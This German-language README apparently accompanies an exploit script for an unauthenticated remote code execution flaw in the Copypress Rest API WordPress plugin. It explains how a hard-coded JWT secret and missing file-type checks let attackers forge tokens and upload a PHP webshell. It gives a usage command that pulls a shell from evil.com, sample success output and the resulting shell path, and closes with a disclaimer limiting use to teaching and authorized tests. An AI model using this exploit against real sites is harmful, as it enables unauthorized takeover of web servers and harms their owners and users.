
Copypress Rest API 1.1 - 1.2 – Fehlendes konfigurierbares JWT-Secret und Dateityp-Validierung führen zu nicht authentifizierter Remote-Codeausführung
Copypress Rest API 1.1 - 1.2 - Fehlende konfigurierbare JWT-Secret- und Dateityp-Validierung führt zu nicht authentifizierter Remote Code Execution
Das Copypress Rest API Plugin für WordPress (Versionen 1.1 bis 1.2) ist anfällig für Remote Code Execution über die Funktion copyreap_handle_image().
Das Plugin verwendet einen hartcodierten JWT-Signaturschlüssel, wenn kein Secret gesetzt ist, und validiert keine Dateitypen, wodurch nicht authentifizierte Angreifer Token fälschen und beliebige Dateien (z. B. PHP-Shells) über den Bild-Handler-Endpunkt hochladen können.
Skriptname: CVE-2025-8625.py
Dieses Python-Skript automatisiert die Ausnutzung der Schwachstelle und ermöglicht es Ihnen, ein gültiges JWT zu generieren, eine manipulierte Anfrage zu senden und eine schädliche Datei (Webshell) auf die verwundbare WordPress-Seite hochzuladen.
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
-u / --url: URL der Ziel-WordPress-Seite-shell / --shell: Direkter Link zu Ihrer Webshell oder schädlichen PHP-DateiBeispielausgabe:
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
Shell erfolgreich hochgeladen! 🎉
Beispiel für den Shell-Pfad:
https://target.com/wp-content/uploads/2025/10/shell.php
Dieses Tool ist ausschließlich für Lehrzwecke und autorisierte Penetrationstests bestimmt.
Die Verwendung gegen Ziele ohne ausdrückliche Genehmigung ist rechtswidrig.
Von: Nxploited (Khaled Alenazi)